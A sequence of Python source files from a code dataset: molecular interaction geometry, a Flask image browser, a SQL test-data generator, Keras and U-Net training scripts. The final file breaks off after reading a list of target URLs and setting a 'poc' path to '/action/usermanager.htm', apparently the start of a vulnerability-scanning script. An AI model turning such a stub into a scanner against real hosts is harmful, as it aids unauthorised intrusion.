= self.association_type.name\n record_attr['assoc_member_pair_idxs'] = self.assoc_member_pair_idxs\n record_attr['arom_a_feature_type'] = self.feature_types[0]\n record_attr['arom_b_feature_type'] = self.feature_types[1]\n\n return PiCationTypeRecord(**record_attr)\n\ndef calc_tertiary_amine_angle(cation):\n angle = None\n return angle\n\ndef calc_centroid_offset(arom_coords, other_centroid):\n arom_centroid = calc_centroid(arom_a_coords)\n norm = calc_arom_norm(arom_coords)\n # get the direction facing the other centroid\n\ndef calc_aroms_centroid_offset(arom_a_coords, arom_b_coords):\n \"\"\"Project the centers of each ring over each other and get\n the offset\"\"\"\n\n # get the centroid coordinates\n centroid_a, centroid_b = [calc_centroid(arom_coords) for\n arom_coords in (arom_a_coords, arom_b_coords)]\n\n # get the norms that are facing each other\n face_norm_a, face_norm_b = calc_arom_facing_norms(arom_a_coords, arom_b_coords)\n\n # the 
vector going from centroid a to b\n centroid_vec_a = centroid_b - centroid_a\n # vector from b to a\n centroid_vec_b = centroid_a - centroid_b\n\n # calculate the rejection of the centroid vector on the normal\n # face vector, which is the projection on the plane defined by the\n # normal vector in the direction of the centroid vector\n norm_a_proj = calc_vector_rejection(centroid_vec_a, face_norm_a)\n norm_b_proj = calc_vector_rejection(centroid_vec_b, face_norm_b)\n\n # compare the magnitudes of the two\n centroid_offset = min(la.norm(norm_a_proj), la.norm(norm_b_proj))\n\n return centroid_offset\n\ndef calc_vector_rejection(vec_a, vec_b):\n \"\"\"Reject vec_a onto vec_b\"\"\"\n\n projection_vec = calc_vector_projection(vec_a, vec_b)\n # a_2 = a - a_1\n return vec_a - projection_vec\n\ndef calc_vector_projection(vec_a, vec_b):\n \"\"\"Project vec_a onto vec_b.\"\"\"\n\n # a_1 = (a dot b_norm) dot b_norm\n vec_b_norm = vec_b / la.norm(vec_b)\n return np.dot(np.dot(vec_a, vec_b_norm), vec_b_norm)\n\ndef calc_facing_vector(vec_up, point):\n vec_down = -1 * vec_up\n\n d_up = euclidean(vec_up, point)\n d_down = euclidean(vec_down, point)\n\n face_vec = vec_up if d_up < d_down else vec_down\n return face_vec\n\ndef calc_arom_facing_norms(arom_a_coords, arom_b_coords):\n \"\"\"Given two aromatic rings get the normal vectors that face the other ring\"\"\"\n\n centroids = [calc_centroid(arom_coords) for arom_coords in [arom_a_coords, arom_b_coords]]\n arom_norms = calc_arom_norms(arom_a_coords, arom_b_coords)\n\n face_norms = []\n for i, arom_norm in enumerate(arom_norms):\n # get the index of the other arom\n j = 1 if i ==0 else 0\n norm = calc_facing_vector(arom_norm + centroids[i], centroids[j])\n # norm_up = arom_norm\n # norm_down = -1 * arom_norm\n # # get the norm so that it points to the other ring\n # d_up = euclidean(norm_up + centroids[i], centroids[j])\n # d_down = cdist(norm_down + centroids[i], centroids[j])\n # norm = norm_up if d_up < d_down else 
norm_down\n face_norms.append(norm)\n\n return face_norms\n\ndef calc_centroid(atom_coords):\n return atom_coords.mean(axis=0)\n\ndef calc_centroid_distance(arom_a_coords, arom_b_coords):\n centroid_a, centroid_b = calc_centroids(arom_a_coords, arom_b_coords)\n centroid_distance = cdist([centroid_a], [centroid_b])[0,0]\n return centroid_distance\n\ndef calc_arom_norms(arom_a_coords, arom_b_coords):\n # Calculate and check the angle between the two ring normal vectors\n\n centroids = calc_centroids(arom_a_coords, arom_b_coords)\n\n arom_norms = []\n for i, arom_coords in enumerate([arom_a_coords, arom_b_coords]):\n # get the coordinates of two atoms on the ring\n a0 = arom_coords[0]\n if len(arom_coords) in [6,5]:\n a1 = arom_coords[2]\n else:\n raise InteractionError(\"aromatic rings without 5 or 6 atoms not supported\")\n\n # get two plane vectors\n a0c = a0 - centroids[i]\n a1c = a1 - centroids[i]\n norm = np.cross(a0c, a1c)\n arom_norms.append(norm)\n\n return tuple(arom_norms)\n\ndef calc_arom_norm(arom_coords):\n centroid = calc_centroid(arom_coords)\n\n a0 = arom_coords[0]\n if len(arom_coords) in [6,5]:\n a1 = arom_coords[2]\n else:\n raise InteractionError(\"aromatic rings without 5 or 6 atoms not supported\")\n\n a0c = a0 - centroid\n a1c = a1 - centroid\n norm = np.cross(a0c, a1c)\n return norm\n\ndef calc_angle(v1, v2):\n try:\n # flip one of them because it is opposite the other\n angle = np.degrees(np.arccos(\n np.dot(v1, v2)/(la.norm(\n v1) * la.norm(v2))))\n except RuntimeWarning:\n print(\"v1: {0} \\n\"\n \"v2: {1}\".format(v1, v2))\n\n return angle\n\ndef calc_arom_normal_angle(arom_a_coords, arom_b_coords):\n\n # get the normal vectors\n arom_norm_a, arom_norm_b = calc_arom_norms(arom_a_coords, arom_b_coords)\n arom_norm_b = -1 * arom_norm_b\n ring_normal_angle = calc_angle(arom_norm_a, arom_norm_b)\n\n # if normals happen to be opposite directions correct and get\n # the angle that is non-negative and smallest\n alt_angle = 180 - 
ring_normal_angle\n ring_normal_angle = min(ring_normal_angle, alt_angle) if not\\\n alt_angle < 0 else ring_normal_angle\n\n return ring_normal_angle\n\n\nclass PiCationInx(Interaction):\n \"\"\"Substantiates PiCationType by selecting donor and acceptor\n features, as well as the involved Hydrogen atom.\n\n \"\"\"\n\n interaction_type = PiCationType\n\n def __init__(self, arom_a, arom_b,\n check=True,\n interaction_class=None,\n **param_values):\n\n if check:\n # use the default settings for the interaction_type only\n # for implicit checks, the idea is that we want the user\n # to mutate the InteractionType to change the\n # classification criteria\n okay, param_values = self.interaction_type.check(arom_a.atoms,\n arom_b.atoms,)\n\n if not okay:\n raise InteractionError\n\n # success, finish creating interaction\n atom_system = arom_a.system\n super().__init__(features=[arom_a, arom_b],\n interaction_type=self.interaction_type,\n system=atom_system,\n **param_values)\n self._arom_a = arom_a\n self._arom_b = arom_b\n\n @property\n def arom_a(self):\n return self._arom_a\n @property\n def arom_b(self):\n return self._arom_b\n\n @property\n def record(self):\n record_fields = ['interaction_class'] + \\\n self.interaction_type.interaction_param_keys\n\n PiCationInxRecord = namedtuple('PiCationInxRecord', record_fields)\n record_attr = {'interaction_class' : self.interaction_class.name}\n\n return PiCationInxRecord(**record_attr, **self.interaction_params)\n","sub_path":"mastic/interactions/pi_cation.py","file_name":"pi_cation.py","file_ext":"py","file_size_in_byte":12675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128196311","text":"import os\nimport argparse\n\nfrom flask import Flask, request, jsonify, render_template\n\nfrom .dedup_utils import filter_dedup, move_to_dedup, del_from_dedup\n\napp = Flask('imagededup-browser')\n\n\n@app.get('/')\n@app.get('/')\ndef index(alg=None):\n return 
render_template('index.html', alg=alg)\n\n\n@app.get('/filter/')\ndef get_filter(alg='phash'):\n _filter = filter_dedup(app.static_folder, alg)\n return jsonify(_filter)\n\n\n@app.put('/move')\ndef move():\n res = move_to_dedup(app.static_folder, request.form.get('img'))\n return jsonify({'result': res})\n\n\n@app.delete('/delete')\ndef delete():\n _del = del_from_dedup(app.static_folder, request.form.get('img'))\n return jsonify(_del)\n\n\n# ################ 测试接口 ###################\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'GET':\n return render_template('login.html')\n else:\n account = request.form.get('account')\n password = request.form.get('password')\n print('account = %s' % account)\n print('password = %s' % password)\n return render_template('login.html', result='登陆失败')\n\n\n@app.get('/testget')\ndef test_get():\n return jsonify(request.args)\n\n\n@app.post('/testpost')\ndef test_post():\n print(app.static_folder)\n print(request.form)\n return jsonify(request.form)\n\n\ndef run_server(folder):\n print(folder)\n app.static_folder = folder\n app.template_folder = os.path.join(os.path.dirname(__file__), 'templates')\n app.run(port=8000, debug=True)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='starting a local website to browser images', prog='flask-web')\n parser.add_argument('direct', help='images dir')\n args = parser.parse_args()\n image_dir = args.direct\n if not os.path.isdir(image_dir):\n print(\"'%s' is not a dir\" % image_dir)\n else:\n run_server(image_dir)\n","sub_path":"src/dedup/webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"572409441","text":"from random import Random\nfrom datetime import datetime, timedelta, time\nfrom faker import Faker\nfrom Client import *\nfrom Participant import *\nfrom ConfDay import *\nfrom Conf import *\nfrom ConfData import 
*\nfrom Location import *\nfrom DayRes import *\nfrom Admission import *\nfrom Workshop import *\nfrom WorksRes import *\nfrom WorksAdmission import *\nfrom Payment import *\nfrom ConfPrice import *\n\nfaker = Faker()\nrand = Random()\n\nnextDayResID = 1\nnextWorksResID = 1\nnextDayID = 1\nnextWorksID = 1\n\nTOTAL_LOCATIONS = 5\nTOTAL_CLIENTS = 999\nTOTAL_PARTICIPANTS = 999\n\ndef genClients(n = TOTAL_CLIENTS, nextcid=1):\n ncid = nextcid\n res = 'SET IDENTITY_INSERT Klient ON'\n cl = Client(ncid, faker)\n res += '\\n'\n res += cl.to_sql()\n res += ','\n ncid += 1\n for i in range(n-1):\n cl = Client(ncid, faker)\n res += '\\n'\n res += cl.to_sql(False)\n if i != n-2:\n res += ','\n ncid += 1\n\n res += \"\\n\"\n res += '\\nSET IDENTITY_INSERT Klient OFF'\n res += \"\\n\"\n return res\n\ndef genParticipants(n = TOTAL_PARTICIPANTS, nextpid=1):\n npid = nextpid\n res = 'SET IDENTITY_INSERT Uczestnicy ON'\n pa = Participant(npid, faker)\n res += '\\n'\n res += pa.to_sql()\n res += ','\n npid += 1\n for i in range(n - 1):\n pa = Participant(npid, faker)\n res += '\\n'\n res += pa.to_sql(False)\n if i != n - 2:\n res += ','\n npid += 1\n\n res += \"\\n\"\n res += '\\nSET IDENTITY_INSERT Uczestnicy OFF'\n res += \"\\n\"\n return res\n\n\ndef genConfDay(cid, conf, date):\n #print('genconfday')\n res = ''\n global nextDayID\n global nextDayResID\n global nextWorksID\n global nextWorksResID\n cd = ConferenceDay(nextDayID, cid, faker, rand, date)\n nextDayID += 1\n res += '\\n'\n res += 'SET IDENTITY_INSERT DzienKonferencji ON'\n res += '\\n'\n res += cd.to_sql()\n res += '\\n'\n res += 'SET IDENTITY_INSERT DzienKonferencji OFF'\n res += \"\\n\"\n\n # Generate Workshops for the day\n for i in range(rand.randint(1, 5)):\n ws = Workshop(nextWorksID, cd, faker, rand)\n cd.workshops.append(ws)\n nextWorksID += 1\n res += \"\\n\"\n res += 'SET IDENTITY_INSERT Warsztat ON'\n res += \"\\n\"\n res += ws.to_sql()\n res += \"\\n\"\n res += 'SET IDENTITY_INSERT Warsztat OFF'\n res += 
\"\\n\"\n\n while cd.freeseats > 0: # Generate reservations for the generated day\n # print('gendayres')\n parts = randint(1, cd.freeseats)\n students = randint(0, parts)\n\n sleft = students\n cd.freeseats -= parts\n res += '\\n'\n res += 'SET IDENTITY_INSERT RezerwacjeKonferencji ON'\n res += '\\n'\n dr = ConfDayReservation(nextDayResID, randint(1, 2997), cd, parts, students, faker, rand)\n dr.price += (conf.baseprice * (parts - students)) + (conf.baseprice * 0.5 * students)\n res += dr.to_sql()\n res += '\\n'\n res += 'SET IDENTITY_INSERT RezerwacjeKonferencji OFF'\n res += '\\n'\n\n # Generate admissions for generated reservation\n participants = rand.sample(range(1, 14985), parts)\n dr.participants = participants\n #print('genadms')\n for p in participants:\n if sleft > 0:\n adm = Admission(p, nextDayResID, 1)\n res += \"\\n\"\n res += adm.to_sql()\n #print('admtosql')\n res += \"\\n\"\n sleft -= 1\n else:\n adm = Admission(p, nextDayResID, 0)\n res += \"\\n\"\n res += adm.to_sql()\n #print('admtosql')\n res += \"\\n\"\n\n # Generate Workshop Reservations for generated reservation\n works_num = randint(0, len(cd.workshops))\n wshops = rand.sample(cd.workshops, works_num)\n for w in wshops:\n if(w.freeseats > 0):\n particips = rand.randint(1, min(w.freeseats, len(dr.participants)))\n w.freeseats -= particips\n dr.price += particips * w.baseprice\n res += \"\\n\"\n res += 'SET IDENTITY_INSERT RezerwacjeWarsztatow ON'\n res += \"\\n\"\n wres = WorksReservation(nextWorksResID, w.work_id, dr, particips, faker, rand)\n res += wres.to_sql()\n res += \"\\n\"\n res += 'SET IDENTITY_INSERT RezerwacjeWarsztatow OFF'\n res += \"\\n\"\n\n # Generate workshop admissions for generated workshop reservation\n wparts = rand.sample(dr.participants, particips)\n for wp in wparts:\n wadm = WorksAdmission(wp, wres.workres_id)\n res += \"\\n\"\n res += wadm.to_sql()\n # print('wadmtosql')\n res += \"\\n\"\n nextWorksResID += 1\n\n # Generate payment for generated reservation\n res 
+= \"\\n\"\n pay = Payment(dr.price, dr.date, dr.res_id, faker, rand)\n res += pay.to_sql()\n res += \"\\n\"\n\n nextDayResID += 1\n\n\n\n res += \"\\n\"\n\n return res\n\ndef genLocations(n = TOTAL_LOCATIONS):\n loc = Location()\n res = ''\n res += \"\\n\"\n res += loc.to_sql()\n res += \",\"\n for i in range(n - 1):\n loc = Location()\n res += '\\n'\n res += loc.to_sql(False)\n if i != n - 2:\n res += ','\n res += \"\\n\"\n return res\n\n\ndef genConfData(cid):\n res = ''\n cdt = ConferenceData(cid, faker)\n res += \"\\n\"\n res += cdt.to_sql()\n res += \"\\n\"\n return res\n\ndef genConf(nextcid, locnum=TOTAL_LOCATIONS):\n #print('genconf')\n ncid = nextcid\n res = 'SET IDENTITY_INSERT Konferencje ON'\n sdate = faker.date_between(start_date='-5y', end_date='today')\n days = randint(1, 5)\n edate = sdate + timedelta(days=days-1)\n price = round(random.uniform(10.0, 1000.0), 2)\n cf = Conference(ncid, randint(1, locnum), sdate, edate, price, faker)\n res += '\\n'\n res += cf.to_sql()\n res += \"\\n\"\n res += '\\nSET IDENTITY_INSERT Konferencje OFF'\n for i in range(days):\n res += \"\\n\"\n res += genConfDay(ncid, cf, sdate)\n sdate += timedelta(days=1)\n res += \"\\n\"\n res += genConfData(ncid)\n\n pcs = rand.randint(1, 4)\n dts = rand.sample(range(9), pcs)\n for i in range(pcs):\n res += \"\\n\"\n cp = ConferencePrice(ncid, dts[i], faker, rand)\n res += cp.to_sql()\n res += \"\\n\"\n\n return res\n\nfile_obj = open(\"res.sql\",'w')\n\n\n# print(genConf(1))\nfor o in range(72):\n #print(genConf(o+1))\n file_obj.write(genConf(o+1))\n\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"608556122","text":"# -*- coding: utf-8 -*-\n'''\nРешение задачи https://github.com/Koziev/WordRepresentations с помощью нейросетки на Keras.\n\nПроверяется только один вариант представления слов - sparse distributed representation.\n\nТак 
как проверяемые представления слов (sparse distributed representations) имеют\nочень большую размерность (1024 или больше), то сгенерировать сразу тренировочную\nматрицу для всех сэмплов в памяти не возможно. Поэтому генерируем датасеты порциями\nи используем специальные методы в Keras модели - fit_generator и evaluate_generator.\nГенератор порций реализован в функции generate_rows. За основу берется представление\nслов индексами в лексиконе (класс WordIndeces_Vectorizer). Далее каждая порция создается\nпростой заменой индекса на вектор соответствующего слова.\n\n(c) Козиев Илья inkoziev@gmail.com\n'''\n\nfrom __future__ import print_function\nimport gc\nimport sklearn\nimport codecs\nimport random\nimport sys\nimport numpy as np\nfrom keras.layers import Dense, Dropout, Input, Flatten\nfrom keras.layers.core import Reshape\nfrom keras.layers.merge import concatenate\nfrom keras.layers import Embedding\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.models import Model\nfrom keras.layers import Conv1D, GlobalMaxPooling1D, GlobalAveragePooling1D, MaxPooling1D, AveragePooling1D\nfrom DatasetVectorizers import WordIndeces_Vectorizer\nfrom DatasetSplitter import split_dataset\nimport CorpusReaders\n\n\n\n# арность N-грамм\nNGRAM_ORDER = 3\n\n# кол-во сэмплов в датасете\nNB_SAMPLES = 10000000\n\n# Архитектура нейросети\nNET_ARCH = 'MLP' # 'MLP' | 'CNN'\n\n# -----------------------------------------------------------------------\n\ndef generate_rows(X, sdr_vec_len, y, index2word, word2sdr, batch_size):\n \"\"\"\n Генератор порций данных для обучения и валидации.\n \n \n :param X: полный списк N-грамм, каждое слово представлено целочисленным индексом\n :param sdr_vec_len: длина вектора представления слова\n :param y: список эталонных значений классификации для N-грамм в X\n :param index2word: словарь для получения текстового представления слова по его индексу в X\n :param word2sdr: словарь 
для получения вектора слова\n :param batch_size: размер генерируемых порций\n :return: пара матриц X_batch и y_batch\n \"\"\"\n nrow = X.shape[0]\n ngram_arity = X.shape[1]\n input_size = ngram_arity*sdr_vec_len\n nb_batch = int(nrow/batch_size)\n\n X_batch = np.zeros( (batch_size, input_size), dtype=np.bool )\n y_batch = np.zeros( (batch_size), dtype=np.bool )\n\n #try:\n while True:\n indeces = range(nrow)\n random.shuffle(indeces)\n\n for ibatch in range(nb_batch):\n\n X_batch.fill(0)\n y_batch.fill(0)\n\n for irow in range(batch_size):\n ii = ibatch*batch_size + irow\n ngram = X[ii,:]\n for j in range(ngram_arity):\n word = index2word[ngram[j]]\n if word in word2sdr:\n X_batch[irow, j*sdr_vec_len:(j+1)*sdr_vec_len] = word2sdr[word]\n\n y_batch[irow] = y[ii]\n\n yield ({'input_layer': X_batch}, {'output_layer': y_batch})\n\n #except:\n # print( 'Unexpected error: {}'.format( sys.exc_info()[0] ) )\n # raise\n\n# -----------------------------------------------------------------------\n\ndef build_model( input_size ):\n\n x_input = Input(shape=(input_size,), dtype='float32', name='input_layer')\n ndense = input_size\n\n print('Building MLP...')\n net = Dense(units=ndense, activation='relu')(x_input)\n #net = BatchNormalization()(net)\n net = Dense(units=int(ndense / 2), activation='relu')(net)\n #net = BatchNormalization()(net)\n net = Dense(units=int(ndense / 3), activation='relu')(net)\n #net = BatchNormalization()(net)\n net = Dense( units=int(ndense/4), activation='relu' )(net)\n #net = BatchNormalization()(net)\n net = Dense(units=1, activation='sigmoid', name='output_layer')(net)\n\n model = Model(inputs=x_input, outputs=net)\n model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n return model\n\n\n# -----------------------------------------------------------------------\n\ncorpus_reader = CorpusReaders.ZippedCorpusReader('../data/corpus.txt.zip')\n#corpus_reader = 
CorpusReaders.TxtCorpusReader(r'f:\\Corpus\\Raw\\ru\\tokenized_w2v.txt')\n\n\ndataset_generator = WordIndeces_Vectorizer()\nX_data,y_data = dataset_generator.vectorize_dataset(corpus_reader=corpus_reader, ngram_order=NGRAM_ORDER, nb_samples=NB_SAMPLES)\ngc.collect()\nX_train, y_train, X_val, y_val, X_holdout, y_holdout = split_dataset(X_data, y_data )\nngram_arity = dataset_generator.get_ngram_arity()\ngc.collect()\n\nword2id = dataset_generator.get_vocabulary()\n# Нам нужны SDR векторы только для этих слов.\nngram_words = set(word2id.keys())\nindex2word = dict( (i,w) for (w,i) in word2id.iteritems() )\n\n\n# Грузим SDR.\n# TODO: вынести загрузчик в отдельный класс.\nsdr_path = r'/home/eek/polygon/WordSDR2/sdr.dat'\nprint('Loading SDRs...')\nword2sdr = dict()\nwith codecs.open(sdr_path, 'r', 'utf-8') as rdr:\n line0 = rdr.readline().strip()\n toks = line0.split(u' ')\n nword = int(toks[0])\n veclen = int(toks[1])\n for line in rdr:\n tx = line.strip().split()\n word = tx[0]\n if word in ngram_words:\n vec = [(True if float(z) > 0.0 else False) for z in tx[1:]]\n vec = np.asarray(vec, dtype=np.bool)\n word2sdr[word] = vec\n\ninput_size = veclen * ngram_arity\n\n# Создаем сетку нужной архитектуры\nmodel = build_model(input_size)\n\nweights_filename = 'wr_keras.model'\n\nprint('Train...')\n\n# Генерируем батчи из обучающего набора.\n# Перед каждой эпохой тасуем обучающие N-граммы.\n\nbatch_size = 200\nsteps_per_epoch = int(X_train.shape[0]/batch_size)\n\n\nmodel_checkpoint = ModelCheckpoint( weights_filename, monitor='val_acc', verbose=1,\n save_best_only=True, mode='auto')\nearly_stopping = EarlyStopping(monitor='val_acc', patience=5, verbose=1, mode='auto')\n\n\nmodel.fit_generator( generator=generate_rows(X_train, veclen, y_train, index2word, word2sdr, batch_size),\n steps_per_epoch=steps_per_epoch,\n epochs=100,\n verbose=1,\n callbacks=[model_checkpoint, early_stopping],\n validation_data=generate_rows(X_val, veclen, y_val, index2word, word2sdr, batch_size),\n 
validation_steps=int(X_val.shape[0]/batch_size),\n )\n #class_weight=None,\n #max_queue_size=10,\n #workers=1,\n #use_multiprocessing=False,\n #initial_epoch=0 )\n\n\nmodel.load_weights(weights_filename)\n\nprint('Final evaluation...')\nres = model.evaluate_generator( generator=generate_rows(X_holdout, veclen, y_holdout, index2word, word2sdr, batch_size),\n steps=int(X_holdout.shape[0]/batch_size) )\n\nprint('holdout acc={}'.format(res[model.metrics_names.index('acc')]))\n","sub_path":"PyModels/wr_keras_sdr2.py","file_name":"wr_keras_sdr2.py","file_ext":"py","file_size_in_byte":8091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247947356","text":"import tensorflow as tf \nimport keras.backend.tensorflow_backend as KTF \n \nKTF.set_session(tf.Session(config=tf.ConfigProto(device_count={'gpu':0}))) \n\n\nimport cv2\nimport os\nimport numpy as np\n\n\ndef make_df(train_path, test_path, img_size):\n train_ids = next(os.walk(train_path))[1]\n test_ids = next(os.walk(test_path))[1]\n X_train = np.zeros((len(train_ids), img_size, img_size, 3), dtype=np.uint8)\n Y_train = np.zeros((len(train_ids), img_size, img_size, 1), dtype=np.bool)\n for i, id_ in enumerate(train_ids):\n path = train_path + id_\n img = cv2.imread(path + '/images/' + id_ + '.png')\n img = cv2.resize(img, (img_size, img_size))\n X_train[i] = img\n mask = np.zeros((img_size, img_size, 1), dtype=np.bool)\n for mask_file in next(os.walk(path + '/masks/'))[2]:\n mask_ = cv2.imread(path + '/masks/' + mask_file, 0)\n mask_ = cv2.resize(mask_, (img_size, img_size))\n mask_ = mask_[:, :, np.newaxis]\n mask = np.maximum(mask, mask_)\n Y_train[i] = mask\n X_test = np.zeros((len(test_ids), img_size, img_size, 3), dtype=np.uint8)\n sizes_test = []\n for i, id_ in enumerate(test_ids):\n path = test_path + id_\n img = cv2.imread(path + '/images/' + id_ + '.png')\n sizes_test.append([img.shape[0], img.shape[1]])\n img = cv2.resize(img, (img_size, img_size))\n 
X_test[i] = img\n\n return X_train, Y_train, X_test, sizes_test\n\nfrom keras.layers.convolutional import Conv2D, Conv2DTranspose\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.layers.merge import concatenate\nfrom keras.models import Model\nfrom keras.layers import Input\nfrom keras.layers.core import Dropout, Lambda\n\n\ndef Unet(img_size):\n inputs = Input((img_size, img_size, 3))\n s = Lambda(lambda x: x / 255)(inputs)\n\n c1 = Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(s)\n c1 = Dropout(0.1)(c1)\n c1 = Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c1)\n p1 = MaxPooling2D((2, 2))(c1)\n\n c2 = Conv2D(32, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(p1)\n c2 = Dropout(0.1)(c2)\n c2 = Conv2D(32, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c2)\n p2 = MaxPooling2D((2, 2))(c2)\n\n c3 = Conv2D(64, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(p2)\n c3 = Dropout(0.2)(c3)\n c3 = Conv2D(64, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c3)\n p3 = MaxPooling2D((2, 2))(c3)\n\n c4 = Conv2D(128, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(p3)\n c4 = Dropout(0.2)(c4)\n c4 = Conv2D(128, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c4)\n p4 = MaxPooling2D(pool_size=(2, 2))(c4)\n\n c5 = Conv2D(256, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(p4)\n c5 = Dropout(0.3)(c5)\n c5 = Conv2D(256, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c5)\n\n u6 = Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)\n u6 = concatenate([u6, c4])\n c6 = Conv2D(128, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(u6)\n c6 = Dropout(0.2)(c6)\n c6 = Conv2D(128, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c6)\n\n u7 = 
Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)\n u7 = concatenate([u7, c3])\n c7 = Conv2D(64, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(u7)\n c7 = Dropout(0.2)(c7)\n c7 = Conv2D(64, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c7)\n\n u8 = Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)\n u8 = concatenate([u8, c2])\n c8 = Conv2D(32, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(u8)\n c8 = Dropout(0.1)(c8)\n c8 = Conv2D(32, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c8)\n\n u9 = Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)\n u9 = concatenate([u9, c1], axis=3)\n c9 = Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(u9)\n c9 = Dropout(0.1)(c9)\n c9 = Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c9)\n\n outputs = Conv2D(1, (1, 1), activation='sigmoid')(c9)\n\n model = Model(inputs=[inputs], outputs=[outputs])\n\n return model\n\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\ndef generator(xtr, xval, ytr, yval, batch_size):\n data_gen_args = dict(horizontal_flip=True,\n vertical_flip=True,\n rotation_range=90.,\n width_shift_range=0.1,\n height_shift_range=0.1,\n zoom_range=0.1)\n image_datagen = ImageDataGenerator(**data_gen_args)\n mask_datagen = ImageDataGenerator(**data_gen_args)\n image_datagen.fit(xtr, seed=7)\n mask_datagen.fit(ytr, seed=7)\n image_generator = image_datagen.flow(xtr, batch_size=batch_size, seed=7)\n mask_generator = mask_datagen.flow(ytr, batch_size=batch_size, seed=7)\n train_generator = zip(image_generator, mask_generator)\n\n val_gen_args = dict()\n image_datagen_val = ImageDataGenerator(**val_gen_args)\n mask_datagen_val = ImageDataGenerator(**val_gen_args)\n image_datagen_val.fit(xval, seed=7)\n mask_datagen_val.fit(yval, seed=7)\n image_generator_val = image_datagen_val.flow(xval, 
batch_size=batch_size, seed=7)\n mask_generator_val = mask_datagen_val.flow(yval, batch_size=batch_size, seed=7)\n val_generator = zip(image_generator_val, mask_generator_val)\n\n return train_generator, val_generator\n\nimport tensorflow as tf\nimport numpy as np\nfrom keras import backend as K\nfrom keras.losses import binary_crossentropy\n\n\ndef mean_iou(y_true, y_pred):\n prec = []\n for t in np.arange(0.5, 1.0, 0.05):\n y_pred_ = tf.to_int32(y_pred > t)\n score, up_opt = tf.metrics.mean_iou(y_true, y_pred_, 2)\n K.get_session().run(tf.local_variables_initializer())\n with tf.control_dependencies([up_opt]):\n score = tf.identity(score)\n prec.append(score)\n return K.mean(K.stack(prec))\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n\ndef bce_dice_loss(y_true, y_pred):\n return 0.5 * binary_crossentropy(y_true, y_pred) - dice_coef(y_true, y_pred)\n\nfrom skimage.morphology import label\n\ndef rle_encoding(x):\n dots = np.where(x.T.flatten() == 1)[0]\n run_lengths = []\n prev = -2\n for b in dots:\n if (b>prev+1): run_lengths.extend((b + 1, 0))\n run_lengths[-1] += 1\n prev = b\n return run_lengths\n\ndef prob_to_rles(x, cutoff=0.5):\n lab_img = label(x > cutoff)\n for i in range(1, lab_img.max() + 1):\n yield rle_encoding(lab_img == i)\n\nimport cv2\nimport os\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\nif __name__ == \"__main__\":\n img_size = 320\n batch_size = 32\n train_path = '/home/u784799i/kaggle_new/stage1_train/'\n test_path = '/home/u784799i/kaggle_new/stage1_test/'\n \n X_train, Y_train, X_test, sizes_test = make_df(train_path, test_path, img_size)\n xtr, xval, ytr, yval = train_test_split(X_train, Y_train, test_size=0.1, random_state=7)\n train_generator, val_generator = generator(xtr, xval, ytr, yval, batch_size)\n \n 
model = Unet(img_size)\n model.summary()\n model.compile(optimizer='adam', loss=bce_dice_loss, metrics=[mean_iou])\n \n model.fit_generator(train_generator, steps_per_epoch=len(xtr)/6, epochs=40,\n validation_data=val_generator, validation_steps=len(xval)/batch_size)\n \n preds_test = model.predict(X_test, verbose=1)\n\n preds_test_upsampled = []\n for i in range(len(preds_test)):\n preds_test_upsampled.append(cv2.resize(preds_test[i], \n (sizes_test[i][1], sizes_test[i][0])))\n \n test_ids = next(os.walk(test_path))[1]\n new_test_ids = []\n rles = []\n for n, id_ in enumerate(test_ids):\n rle = list(prob_to_rles(preds_test_upsampled[n]))\n rles.extend(rle)\n new_test_ids.extend([id_] * len(rle))\n sub = pd.DataFrame()\n sub['ImageId'] = new_test_ids\n sub['EncodedPixels'] = pd.Series(rles).apply(lambda x: ' '.join(str(y) for y in x))\n sub.to_csv('sub.csv', index=False)\n","sub_path":"opencv_generator.py","file_name":"opencv_generator.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169431330","text":"\nimport json\nimport requests\n\n\nurls = open('url.txt')\n\npoc = '/action/usermanager.htm'\n\nfor i in 